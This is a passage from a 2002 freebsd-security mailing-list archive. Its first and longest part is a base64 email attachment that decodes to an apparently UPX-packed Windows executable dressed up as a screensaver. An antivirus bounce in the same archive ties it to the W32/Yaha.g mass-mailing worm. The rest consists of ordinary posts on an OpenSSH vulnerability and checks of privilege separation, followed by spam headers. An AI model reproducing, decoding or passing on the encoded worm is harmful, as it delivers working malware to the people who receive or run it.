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 ifl5Bw+3B0dQR7lXSPKuVf+WvEcBAAnAdAeJA4PDBOvY/5bARwEAYek7Hf//AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAwAAACgAAIAOAAAAaAAAgBAAAACoAACAAAAAAAAAAAAA AAAAAAABAAEAAABAAACAAAAAAAAAAAAAAAAAAAABAAkEAABYAAAA7FABAOgCAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAQBsAAAAgAAAgAAAAAAAAAAAAAAAAAAAAQAJBAAAmAAAANhTAQAUAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAEAAQAAAMAAAIAAAAAAAAAAAAAAAAAAAAEACQQAANgAAADwUwEA KAMAAAAAAAAAAAAAGCQBACgAAAAgAAAAQAAAAAEABAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAACAAACAAAAAgIAAgAAAAIAAgACAgAAAwMDAAICAgAAAAP8AAP8AAAD//wD/AAAA/wD/AP// AAD///8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAPoAAAAAAAAAAAAAAAAAAAD6AAAAAAAAAAAAAAAAAAAPqqAAAAAAAAAAAAAAAAAAD6qgAAAA AAAAAAAAAAAAAPqqqgAAAAAAAAAAAAAAAAD6qqoAAAAAAAAAAAAAAAAPqqqqoAAAAAAAAAAAAAAA +qqqqqoAAAAAAAAAAAAAD6qqqqqqoAAAAAAAAAAAAA+qqqqqqqAAAAAAAAAAAAD6qqqqqqqqAAAA AAAAAAAPqqqqqqqqqqAAAAAAAAAA+qqqqqqqqqqqAAAAAAAAD6qqqqqqqqqqqqAAAAAAAPqqqqqq qqqqqqqqAAAAAAD6qqqqqqqqqqqqqgAAAAAPqqqqqqqqqqqqqqqgAAAAD6qqqqqqqqqqqqqqoAAA APqqqqqqqqqqqqqqqqoAAAD6qqqqqqqvqqqqqqqqAAAA+qqqqqqqAPqqqqqqqgAAAPqqqqqqqgD6 qqqqqqoAAAAPqqqqqqAAD6qqqqqgAAAAD6qqqqqgAA+qqqqqoAAAAAD/qqqqAAAA/6qqqgAAAAAA AP///wAAAAD///8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAD//////////////////H////x////4P///+D////Af///wH///4A///8AH//+AA///gAP/ /wAB//4AAP/8AAB/+AAAP/AAAB/wAAAf4AAAD+AAAA/AAAAHwAAAB8ABAAfAAQAH4AOAD+ADgA/w B8Af/A/wP////////////////wAnAQAAAAEAAQAgIBAAAQAEAOgCAAABAPAgAQAoAzQAAABWAFMA XwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAUAAgAAAAAABQACAAAAPwAA AAAAAAAEAAQAAQAAAAAAAAAAAAAAAAAAAIgCAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYA bwAAAGQCAAABADAANAAwADkAMAA0AGIAMAAAADIADQABAEMAbwBtAG0AZQBuAHQAcwAAAFMAYwBy AGUAZQBuACAAUwBhAHYAZQByAAAAAABIABQAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAHcA dwB3AC4AcwBjAHIAZQBlAG4AcwBhAHYAZQByAC4AYwBvAG0AAABCAA0AAQBGAGkAbABlAEQAZQBz AGMAcgBpAHAAdABpAG8AbgAAAAAAUwBjAHIAZQBlAG4AIABTAGEAdgBlAHIAAAAAADYACwABAEYA aQBsAGUAVgBlAHIAcwBpAG8AbgAAAAAANQAsACAAMAAsACAAMAAsACAAMgAAAAAAIAAAAAEASQBu AHQAZQByAG4AYQBsAE4AYQBtAGUAAABGABEAAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQA AABDAG8AcAB5AHIAaQBnAGgAdAAgAKkAIAAyADAAMAAyAAAAAAAoAAAAAQBMAGUAZwBhAGwAVABy AGEAZABlAG0AYQByAGsAcwAAAAAAKAAAAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0A ZQAAACAAAAABAFAAcgBpAHYAYQB0AGUAQgB1AGkAbABkAAAAIAAAAAEAUAByAG8AZAB1AGMAdABO AGEAbQBlAAAAAAA6AAsAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAA1ACwAIAAwACwA IAAwACwAIAAyAAAAAAAgAAAAAQBTAHAAZQBjAGkAYQBsAEIAdQBpAGwAZAAAAEQAAAABAFYAYQBy AEYAaQBsAGUASQBuAGYAbwAAAAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAJBLAE AAAAAAAAAAAAAAAA+FcBALhXAQAAAAAAAAAAAAAAAAAFWAEAyFcBAAAAAAAAAAAAAAAAABJYAQDQ VwEAAAAAAAAAAAAAAAAAHFgBANhXAQAAAAAAAAAAAAAAAAAkWAEA4FcBAAAAAAAAAAAAAAAAAC9Y AQDoVwEAAAAAAAAAAAAAAAAAO1gBAPBXAQAAAAAAAAAAAAAAAAAAAAAAAAAAAEZYAQBUWAEAZFgB AAAAAAByWAEAAAAAAIBYAQAAAAAAiFgBAAAAAACYWAEAAAAAAKBYAQAAAAAAdAAAgAAAAABLRVJO RUwzMi5ETEwAQURWQVBJMzIuZGxsAEdESTMyLmRsbABNUFIuZGxsAFVTRVIzMi5kbGwAV0lOSU5F VC5kbGwAV1MyXzMyLmRsbAAAAExvYWRMaWJyYXJ5QQAAR2V0UHJvY0FkZHJlc3MAAEV4aXRQcm9j ZXNzAAAAUmVnQ2xvc2VLZXkAAABCaXRCbHQAAFdOZXRDbG9zZUVudW0AAABHZXREQwAAAEludGVy bmV0R2V0Q29ubmVjdGVkU3RhdGUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAGJz3epai1ErtTDCkzrTECkvWlRS+DdsaNzmxILyDzX0tC2GuF6lVYFIACipLZ+IUfiKnAx9t yqdLhV4YmUfrQfUJbuaNH1lp57aQPpc8lZGgkpeaUh6Utd50o18zsWXBTLBgRlmomCFRkhTKFcc2 mLzwpACNOaG4HXJMUmYSk6o5nGTTksky20ce6cLYdSko1IAEe8iX0/FKDT07l9hFCQ2vriQCA8iQ uShe8NZqu6GJpc1xpTtoECFV9cMXFtqpRBdCbixreLHcwId3iLF4BlhuEkN2iFpmSZR0cam9MdOb WkNOQx6zcyGgwIdTS0IMFQPan2cuxMLPizr0JcmJjxRjuEc/Gpp9Gn0SYyDwxOze50EOPIKNyPQ4 9D+5vYpazHi1Mt0InBCkm79NmS72bewgSVdojdSGRuhWDZYkdEgoKCSxVI6jKN2EucJUczYXzNDg V1RpU5FTiORRcWsHIdJg6q3oFysiAhREQVQDcbs/swT5ywswZAn0NVHrs18UiWgfNVPpEkKal0eD kiEDFxizmD+T8wLFhqzFCjQQFCxa6pdWJjGwBmmH2SWrieBegQZtTgzf5hoqch/VL18m25fZETGc 6tPaSuzkBMtGO1ToXmlSWyN2nm1kpRWlblFBoXSVCbDSyXZvDmILJdj5VOi/WIpV+KzVJ93jKeK5 g/dLc78pMaxzeT1vOSprvkRfRm0biGtsABZCqTCqDrI3U2vRdBxl4tq+TxRYegxu5BgBHUynEYaG OgEE1D/yo1o0NNByb3rU3BR0P5FGKQYKhmuvr5gjBpmkyVJdkzG0cQPkOkuoUbuPn6SUtr/cfWSV 6LMV5m9nLF1TW+SP7LVU5zgT1pp7mahQQy+OVI7VAIBCs/J4VkeRF21F1xtUimVz0aWQ9jZkKXCu QO5mu6OIS0ndGBz43rYDI6xiMOfMcebVqjXXkbDIGpR1do5unBF2IWzqt1Fjxd/GVLLnLw3ROWNM TyRLNXDr+OTqe272BzgjLzF+wcGtMvV9CI1RhVCmD8xy8rg+qxbg5gneLxyMQtY+YHTT1qLwU4+C UxZwIlRkCBF8LRN3UMEnQa/kGyXSD+7q8WNVUqrWjUSqGLbp10cJvg5mzVktCr1Su5rWl+TEHVI9 RbLgo7ylZxeqW/d39CrV+RJ4L4qlCtAr7RpwATzLCcDlUSGRT2HpEtoD4uOeXdHAgL9g8HjIKPYy iXBDyYB4CHB0BdlLt9JaWy3CptiQJA62ULCuzAMDgZKUJlUvBAiw2SM4i2zJOrWYTymlYl8TWnul pXcUMcv0y5Eme0RfAXakOM8azVAA8cWBQZVTku+dSgXOoAMg6MpytNyxGzO1L06DULq9PyEZxQZy gKo6MYpBnqk8S9LMi8XYGVwAM4amuHynMJ3AeiA1qL03C/fnIHBzzKdA0tq0uQjnkX2dkezUu3TJ N3zoMG5JoSvneW5gVWR0OhLubxsBtTb4VeYpGvVjenpqh1iZalkFOUUK44BmJFKTUkTfZQGY8/F7 53RN --Boundary_(ID_7+HkFfWUYiV9wZBgnwVAxQ)-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 2:35:28 2002 Delivered-To: freebsd-security@freebsd.org Received: from web.htc.sk (ns.htc.sk [195.146.149.36]) by hub.freebsd.org (Postfix) with ESMTP id 0065237B4E2 for ; Tue, 25 Jun 2002 02:32:03 -0700 (PDT) From: LNTS/Technical_Support/HTC%HTC X-Priority: 3 (Normal) Date: Tue, 25 Jun 2002 11:31:41 +0200 Subject: Report to Recipient(s) To: freebsd-security@freebsd.org Message-ID: X-MIMETrack: Serialize by Router on Domino/HTC(Release 5.0.9 |November 16, 2001) at 25.06.2002 11:32:30 MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Incident Information:- Originator: owner-freebsd-security@FreeBSD.ORG Recipients: freebsd-security@freebsd.org Subject: Fw: cookies WARNING: The file .pif you received was infected with the W32/Yaha.g@MM virus. The file attachment was not successfully cleaned. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 2:36:43 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail-relay1.yahoo.com (mail-relay1.yahoo.com [216.145.48.34]) by hub.freebsd.org (Postfix) with ESMTP id 3361437B6A5; Tue, 25 Jun 2002 02:34:22 -0700 (PDT) Received: from FreeBSD.org (socks1.yahoo.com [216.145.50.200]) by mail-relay1.yahoo.com (Postfix) with ESMTP id 80D898B5A4; Tue, 25 Jun 2002 02:33:53 -0700 (PDT) Message-ID: <3D1838FF.DE572927@FreeBSD.org> Date: Tue, 25 Jun 2002 02:33:51 -0700 From: Doug Barton Organization: Triborough Bridge & Tunnel Authority X-Mailer: Mozilla 4.79 [en] (X11; U; FreeBSD 4.6-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: mjacob@feral.com Cc: rwatson@FreeBSD.ORG, security@FreeBSD.ORG Subject: Re: Upcoming OpenSSH vulnerability (fwd) References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Matthew Jacob wrote: > > Despite DES's claim that Theo is too hard to work with, perhaps somebody who > understands the issues could see where FreeBSD stands wrt this. We are replacing the openssh version in -current with the latest version of openssh-portable, and enabling privsep by default. I am unsure of the plans to import that into -stable, however you have essentially the same capability to do the upgrade on your -stable system through the ports. The project does not take a stand on how third parties disclose bugs. Neither is that subject on topic for this list. The options available to you have been well documented at this point: 1. Turn off openssh, and/or replace it with another product. 2. Upgrade to the privsep code and hope it makes things better. Personally I think 2 is a reasonable option, but if you don't like it, 1 is still available. Hope this helps, Doug To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 2:39:30 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail-relay1.yahoo.com (mail-relay1.yahoo.com [216.145.48.34]) by hub.freebsd.org (Postfix) with ESMTP id E768437B675 for ; Tue, 25 Jun 2002 02:35:01 -0700 (PDT) Received: from FreeBSD.org (socks1.yahoo.com [216.145.50.200]) by mail-relay1.yahoo.com (Postfix) with ESMTP id 7DE878B5BF; Tue, 25 Jun 2002 02:35:01 -0700 (PDT) Message-ID: <3D183942.6FF6C3B4@FreeBSD.org> Date: Tue, 25 Jun 2002 02:34:58 -0700 From: Doug Barton Organization: Triborough Bridge & Tunnel Authority X-Mailer: Mozilla 4.79 [en] (X11; U; FreeBSD 4.6-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Michael Richards Cc: security@FreeBSD.ORG Subject: Re: Upcoming OpenSSH vulnerability References: <3D17F647.000045.31912@ns.interchange.ca> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Michael Richards wrote: > After reviewing the code of the new 3.3.1p I've located a very simple > yet obscure root exploit for this new version Can we safely assume that you've made the openssh developers aware of your findings? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 2:46:49 2002 Delivered-To: freebsd-security@freebsd.org Received: from itesec.hsc.fr (itesec.hsc.fr [192.70.106.33]) by hub.freebsd.org (Postfix) with ESMTP id A2DC037B675 for ; Tue, 25 Jun 2002 02:46:36 -0700 (PDT) Received: from lise.hsc.fr (lise.hsc.fr [192.70.106.67]) by itesec.hsc.fr (Postfix) with ESMTP id E69B520FA8 for ; Tue, 25 Jun 2002 11:46:35 +0200 (CEST) Received: by lise.hsc.fr (Postfix, from userid 1000) id 7A9D417A859; Tue, 25 Jun 2002 11:49:01 +0200 (CEST) Date: Tue, 25 Jun 2002 11:49:01 +0200 From: Thomas Seyrat To: freebsd-security@FreeBSD.ORG Subject: Re: How to check if "UsePrivilegeSeparation" works in OpenSSH? Message-ID: <20020625094900.GA13755@lise.hsc.fr> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <20020625195333.U69343-100000@a2> <902312FB-8813-11D6-919D-0030654D97EC@patpro.net> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline In-Reply-To: <902312FB-8813-11D6-919D-0030654D97EC@patpro.net> User-Agent: Mutt/1.4i Organization: HSC (Herve Schauer Consultants) X-Operating-System: Debian/GNU/* 3.0 - Linux 2.4.19-pre10-ben0 ppc Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org patpro wrote: > >I don't see the [priv] bit on the second one. > >Can you confirm with lsof that the chroot has taken effect? > well in fact no, nothing about /var/empty in lsof While sshd is waiting for password, I have : sshd 32666 0,0 0,3 3496 1596 ?? I 11:42 0:00,09 sshd: seyrat [net] (sshd) and lsof -p 32666 | grep rtd gives : sshd 32666 sshd rtd VDIR 13,131078 512 4 /var/empty This untrusted sshd process is indeed correctly chrooted. -- Thomas Seyrat. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 25 3: 4:20 2002 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (oe24.pav2.hotmail.com [64.4.36.81]) by hub.freebsd.org (Postfix) with ESMTP id 8A8E137B686; Tue, 25 Jun 2002 02:55:14 -0700 (PDT) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Tue, 25 Jun 2002 02:55:11 -0700 X-Originating-IP: [203.144.144.233] From: "mont" To: Subject: =?windows-874?B?cGFydC10aW1lIDUsMDAwLTEwLDAwMCCk2LOh57fT5LTpICEhIQ==?= Date: Tue, 25 Jun 2002 16:45:57 +0700 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0205_01C21C67.C7D305E0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Message-ID: X-OriginalArrivalTime: 25 Jun 2002 